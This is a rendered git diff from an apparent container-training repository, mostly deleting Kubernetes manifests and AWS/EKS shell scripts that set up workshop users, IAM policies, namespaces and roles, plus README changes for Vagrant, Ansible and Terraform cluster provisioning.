apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: user=jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ user=jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: user=jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: user=jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,64 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -1,13 +0,0 @@
#!/bin/sh
# Create an EKS cluster.
# This is not idempotent (each time you run it, it creates a new cluster).
eksctl create cluster \
--node-type=t3.large \
--nodes-max=10 \
--alb-ingress-access \
--asg-access \
--ssh-access \
--with-oidc \
#

View File

@@ -1,32 +0,0 @@
#!/bin/sh
# For each user listed in "users.txt", create an IAM user.
# Also create AWS API access keys, and store them in "users.keys".
# This is idempotent (you can run it multiple times, it will only
# create the missing users). However, it will not remove users.
# Note that you can remove users from "users.keys" (or even wipe
# that file out entirely) and then this script will delete their
# keys and generate new keys for them (and add the new keys to
# "users.keys".)
echo "Getting list of existing users ..."
aws iam list-users --output json | jq -r .Users[].UserName > users.tmp
for U in $(cat users.txt); do
if ! grep -qw $U users.tmp; then
echo "Creating user $U..."
aws iam create-user --user-name=$U \
--tags=Key=container.training,Value=1
fi
if ! grep -qw $U users.keys; then
echo "Listing keys for user $U..."
KEYS=$(aws iam list-access-keys --user=$U | jq -r .AccessKeyMetadata[].AccessKeyId)
for KEY in $KEYS; do
echo "Deleting key $KEY for user $U..."
aws iam delete-access-key --user=$U --access-key-id=$KEY
done
echo "Creating access key for user $U..."
aws iam create-access-key --user=$U --output json \
| jq -r '.AccessKey | [ .UserName, .AccessKeyId, .SecretAccessKey ] | @tsv' \
>> users.keys
fi
done

View File

@@ -1,51 +0,0 @@
#!/bin/sh
# Create an IAM policy to authorize users to do "aws eks update-kubeconfig".
# This is idempotent, which allows to update the policy document below if
# you want the users to do other things as well.
# Note that each time you run this script, it will actually create a new
# version of the policy, set that version as the default version, and
# remove all non-default versions. (Because you can only have up to
# 5 versions of a given policy, so you need to clean them up.)
# After running that script, you will want to attach the policy to our
# users (check the other scripts in that directory).
POLICY_NAME=user.container.training
POLICY_DOC='{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"eks:DescribeCluster"
],
"Resource": "arn:aws:eks:*",
"Effect": "Allow"
}
]
}'
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
aws iam create-policy-version \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
--policy-document "$POLICY_DOC" \
--set-as-default
# For reference, the command below creates a policy without versioning:
#aws iam create-policy \
#--policy-name user.container.training \
#--policy-document "$JSON"
for VERSION in $(
aws iam list-policy-versions \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
--query 'Versions[?!IsDefaultVersion].VersionId' \
--output text)
do
aws iam delete-policy-version \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
--version-id "$VERSION"
done
# For reference, the command below shows all users using the policy:
#aws iam list-entities-for-policy \
#--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME

View File

@@ -1,14 +0,0 @@
#!/bin/sh
# Attach our user policy to all the users defined in "users.txt".
# This should be idempotent, because attaching the same policy
# to the same user multiple times doesn't do anything.
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
POLICY_NAME=user.container.training
for U in $(cat users.txt); do
echo "Attaching policy to user $U ..."
aws iam attach-user-policy \
--user-name $U \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
done

View File

@@ -1,24 +0,0 @@
#!/bin/sh
# Update the aws-auth ConfigMap to map our IAM users to Kubernetes users.
# Each user defined in "users.txt" will be mapped to a Kubernetes user
# with the same name, and put in the "container.training" group, too.
# This is idempotent.
# WARNING: this will wipe out the mapUsers component of the aws-auth
# ConfigMap, removing all users that aren't in "users.txt".
# It won't touch mapRoles, so it shouldn't break the role mappings
# put in place by EKS.
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
rm -f users.map
for U in $(cat users.txt); do
echo "\
- userarn: arn:aws:iam::$ACCOUNT:user/$U
username: $U
groups: [ container.training ]\
" >> users.map
done
kubectl create --namespace=kube-system configmap aws-auth \
--dry-run=client --from-file=mapUsers=users.map -o yaml \
| kubectl apply -f-

View File

@@ -1,65 +0,0 @@
#!/bin/sh
# Create a shared Kubernetes Namespace ("container-training") as well as
# individual namespaces for every user in "users.txt", and set up a bunch
# of permissions.
# Specifically:
# - each user gets "view" permissions in the "default" Namespace
# - each user gets "edit" permissions in the "container-training" Namespace
# - each user gets permissions to list Nodes and Namespaces
# - each user gets "admin" permissions in their personal Namespace
# Note that since Kubernetes Namespaces can't have dots in their names,
# if a user has dots, dots will be mapped to dashes.
# So user "ada.lovelace" will get namespace "ada-lovelace".
# This is kind of idempotent (but will raise a bunch of errors for objects
# that already exist).
# TODO: if this needs to evolve, replace all the "create" operations by
# "apply" operations. But this is good enough for now.
kubectl create rolebinding --namespace default container.training \
--group=container.training --clusterrole=view
kubectl create clusterrole view-nodes \
--verb=get,list,watch --resource=node
kubectl create clusterrolebinding view-nodes \
--group=container.training --clusterrole=view-nodes
kubectl create clusterrole view-namespaces \
--verb=get,list,watch --resource=namespace
kubectl create clusterrolebinding view-namespaces \
--group=container.training --clusterrole=view-namespaces
kubectl create namespace container-training
kubectl create rolebinding --namespace container-training edit \
--group=container.training --clusterrole=edit
# Note: API calls to EKS tend to be fairly slow. To optimize things a bit,
# instead of running "kubectl" N times, we generate a bunch of YAML and
# apply it. It will still generate a lot of API calls but it's much faster
# than calling "kubectl" N times. It might be possible to make this even
# faster by generating a "kind: List" (I don't know if this would issue
# a single API calls or multiple ones; TBD!)
for U in $(cat users.txt); do
NS=$(echo $U | tr . -)
cat <<EOF
---
kind: Namespace
apiVersion: v1
metadata:
name: $NS
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: admin
namespace: $NS
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: admin
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: User
name: $U
EOF
done | kubectl create -f-

View File

@@ -1,76 +0,0 @@
#!/bin/sh
# Create an IAM role to be used by a Kubernetes ServiceAccount.
# The role isn't given any permissions yet (this has to be done by
# another script in this series), but a properly configured Pod
# should still be able to execute "aws sts get-caller-identity"
# and confirm that it's using that role.
# This requires the cluster to have an attached OIDC provider.
# This should be the case if the cluster has been created with
# the scripts in this directory; otherwise, this can be done with
# the subsequent command, which is idempotent:
# eksctl utils associate-iam-oidc-provider --cluster cluster-name-12341234 --approve
# The policy document used below will authorize all ServiceAccounts
# in the "container-training" Namespace to use that role.
# This script will also annotate the container-training:default
# ServiceAccount so that it can use that role.
# This script is not quite idempotent: if you want to use a new
# trust policy, some work will be required. (You can delete the role,
# but that requires detaching the associated policies. There might also
# be a way to update the trust policy directly; we didn't investigate this
# further at this point.)
if [ "$1" ]; then
CLUSTER="$1"
else
echo "Please indicate cluster to use. Available clusters:"
aws eks list-clusters --output table
exit 1
fi
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
OIDC=$(aws eks describe-cluster --name $CLUSTER --query cluster.identity.oidc.issuer --output text | cut -d/ -f3-)
ROLE_NAME=s3-reader-container-training
TRUST_POLICY=$(envsubst <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::${ACCOUNT}:oidc-provider/${OIDC}"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringLike": {
"${OIDC}:sub": ["system:serviceaccount:container-training:*"]
}
}
}
]
}
EOF
)
aws iam create-role \
--role-name "$ROLE_NAME" \
--assume-role-policy-document "$TRUST_POLICY"
kubectl annotate serviceaccounts \
--namespace container-training default \
"eks.amazonaws.com/role-arn=arn:aws:iam::$ACCOUNT:role/$ROLE_NAME" \
--overwrite
exit
# Here are commands to delete the role:
for POLICY_ARN in $(aws iam list-attached-role-policies --role-name $ROLE_NAME --query 'AttachedPolicies[*].PolicyArn' --output text); do aws iam detach-role-policy --role-name $ROLE_NAME --policy-arn $POLICY_ARN; done
aws iam delete-role --role-name $ROLE_NAME
# Merging the policy with the existing policies:
{
aws iam get-role --role-name s3-reader-container-training | jq -r .Role.AssumeRolePolicyDocument.Statement[]
echo "$TRUST_POLICY" | jq -r .Statement[]
} | jq -s '{"Version": "2012-10-17", "Statement": .}' > /tmp/policy.json
aws iam update-assume-role-policy \
--role-name $ROLE_NAME \
--policy-document file:///tmp/policy.json

View File

@@ -1,54 +0,0 @@
#!/bin/sh
# Create an S3 bucket with two objects in it:
# - public.txt (world-readable)
# - private.txt (private)
# Also create an IAM policy granting read-only access to the bucket
# (and therefore, to the private object).
# Finally, attach the policy to an IAM role (for instance, the role
# created by another script in this directory).
# This isn't idempotent, but it can be made idempotent by replacing the
# "aws iam create-policy" call with "aws iam create-policy-version" and
# a bit of extra elbow grease. (See other scripts in this directory for
# an example).
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
BUCKET=container.training
ROLE_NAME=s3-reader-container-training
POLICY_NAME=s3-reader-container-training
POLICY_DOC=$(envsubst <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject*"
],
"Resource": [
"arn:aws:s3:::$BUCKET",
"arn:aws:s3:::$BUCKET/*"
]
}
]
}
EOF
)
aws iam create-policy \
--policy-name $POLICY_NAME \
--policy-doc "$POLICY_DOC"
aws s3 mb s3://container.training
echo "this is a public object" \
| aws s3 cp - s3://container.training/public.txt \
--acl public-read
echo "this is a private object" \
| aws s3 cp - s3://container.training/private.txt \
--acl private
aws iam attach-role-policy \
--role-name "$ROLE_NAME" \
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME

View File

@@ -1,50 +0,0 @@
ada.lovelace
adele.goldstine
amanda.jones
anita.borg
ann.kiessling
barbara.mcclintock
beatrice.worsley
bessie.blount
betty.holberton
beulah.henry
carleen.hutchins
caroline.herschel
dona.bailey
dorothy.hodgkin
ellen.ochoa
edith.clarke
elisha.collier
elizabeth.feinler
emily.davenport
erna.hoover
frances.spence
gertrude.blanch
grace.hopper
grete.hermann
giuliana.tesoro
harriet.tubman
hedy.lamarr
irma.wyman
jane.goodall
jean.bartik
joy.mangano
josephine.cochrane
katherine.blodgett
kathleen.antonelli
lynn.conway
margaret.hamilton
maria.beasley
marie.curie
marjorie.joyner
marlyn.meltzer
mary.kies
melitta.bentz
milly.koss
radia.perlman
rosalind.franklin
ruth.teitelbaum
sarah.mather
sophie.wilson
stephanie.kwolek
yvonne.brill

View File

@@ -7,8 +7,8 @@ workshop.
## 1. Prerequisites
Virtualbox, Vagrant and Ansible
Virtualbox, Vagrant and Ansible
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
@@ -25,20 +25,19 @@ Virtualbox, Vagrant and Ansible
$ git clone --recursive https://github.com/ansible/ansible.git
$ cd ansible
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
$ git checkout stable-2.0.0.1
$ git submodule update
- source the setup script to make Ansible available on this terminal session:
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).
## 2. Preparing the environment
Change into directory that has your Vagrantfile
Run the following commands:
@@ -67,14 +66,6 @@ will reflect inside the instance.
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
chances are good you not in the correct directory.
Make sure you are in sub directory named "prepare-local". It has all the config files required by ansible, vagrant and virtualbox
- If you are using Python 3.7, running the ansible-playbook provisioning, see an error like "SyntaxError: invalid syntax" and it mentions
the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
https://github.com/ansible/ansible/issues/42105
- If you get strange Ansible errors about dependencies, try to check your pip
version with `pip --version`. The current version is 8.1.1. If your pip is
older than this, upgrade it with `sudo pip install --upgrade pip`, restart

View File

@@ -1,162 +0,0 @@
⚠️ This is work in progress. The UX needs to be improved,
and the docs could be better.
This directory contains a Terraform configuration to deploy
a bunch of Kubernetes clusters on various cloud providers,
using their respective managed Kubernetes products.
## With shell wrapper
This is the recommended use. It makes it easy to start N clusters
on any provider. It will create a directory with a name like
`tag-YYYY-MM-DD-HH-MM-SS-SEED-PROVIDER`, copy the Terraform configuration
to that directory, then create the clusters using that configuration.
1. One-time setup: configure provider authentication for the provider(s) that you wish to use.
- Digital Ocean:
```bash
doctl auth init
```
- Google Cloud Platform: you will need to create a project named `prepare-tf`
and enable the relevant APIs for this project (sorry, if you're new to GCP,
this sounds vague; but if you're familiar with it you know what to do; if you
want to change the project name you can edit the Terraform configuration)
- Linode:
```bash
linode-cli configure
```
- Oracle Cloud: FIXME
(set up `oci` through the `oci-cli` Python package)
- Scaleway: run `scw init`
2. Optional: set number of clusters, cluster size, and region.
By default, 1 cluster will be configured, with 2 nodes, and auto-scaling up to 5 nodes.
If you want, you can override these parameters, with the following variables.
```bash
export TF_VAR_how_many_clusters=5
export TF_VAR_min_nodes_per_pool=2
export TF_VAR_max_nodes_per_pool=4
export TF_VAR_location=xxx
```
The `location` variable is optional. Each provider should have a default value.
The value of the `location` variable is provider-specific. Examples:
| Provider | Example value | How to see possible values
|---------------|-------------------|---------------------------
| Digital Ocean | `ams3` | `doctl compute region list`
| Google Cloud | `europe-north1-a` | `gcloud compute zones list`
| Linode | `eu-central` | `linode-cli regions list`
| Oracle Cloud | `eu-stockholm-1` | `oci iam region list`
You can also specify multiple locations, and then they will be
used in round-robin fashion.
For example, with Google Cloud, since the default quotas are very
low (my account is limited to 8 public IP addresses per zone, and
my requests to increase that quota were denied) you can do the
following:
```bash
export TF_VAR_location=$(gcloud compute zones list --format=json | jq -r .[].name | grep ^europe)
```
Then when you apply, clusters will be created across all available
zones in Europe. (When I write this, there are 20+ zones in Europe,
so even with my quota, I can create 40 clusters.)
3. Run!
```bash
./run.sh <providername>
```
(If you don't specify a provider name, it will list available providers.)
4. Shutting down
Go to the directory that was created by the previous step (`tag-YYYY-MM...`)
and run `terraform destroy`.
You can also run `./clean.sh` which will destroy ALL clusters deployed by the previous run script.
## Without shell wrapper
Expert mode.
Useful to run steps sperarately, and/or when working on the Terraform configurations.
1. Select the provider you wish to use.
Go to the `source` directory and edit `main.tf`.
Change the `source` attribute of the `module "clusters"` section.
Check the content of the `modules` directory to see available choices.
2. Initialize the provider.
```bash
terraform init
```
3. Configure provider authentication.
See steps above, and add the following extra steps:
- Digital Coean:
```bash
export DIGITALOCEAN_ACCESS_TOKEN=$(grep ^access-token ~/.config/doctl/config.yaml | cut -d: -f2 | tr -d " ")
```
- Linode:
```bash
export LINODE_TOKEN=$(grep ^token ~/.config/linode-cli | cut -d= -f2 | tr -d " ")
```
4. Decide how many clusters and how many nodes per clusters you want.
5. Provision clusters.
```bash
terraform apply
```
6. Perform second stage provisioning.
This will install an SSH server on the clusters.
```bash
cd stage2
terraform init
terraform apply
```
7. Obtain cluster connection information.
The following command shows connection information, one cluster per line, ready to copy-paste in a shared document or spreadsheet.
```bash
terraform output -json | jq -r 'to_entries[].value.value'
```
8. Destroy clusters.
```bash
cd ..
terraform destroy
```
9. Clean up stage2.
```bash
rm stage2/terraform.tfstate*
```

View File

@@ -1,9 +0,0 @@
#!/bin/sh
export LINODE_TOKEN=$(grep ^token ~/.config/linode-cli | cut -d= -f2 | tr -d " ")
export DIGITALOCEAN_ACCESS_TOKEN=$(grep ^access-token ~/.config/doctl/config.yaml | cut -d: -f2 | tr -d " ")
for T in tag-*; do
(
cd $T
terraform apply -destroy -auto-approve && mv ../$T ../deleted$T
)
done

Some files were not shown because too many files have changed in this diff Show More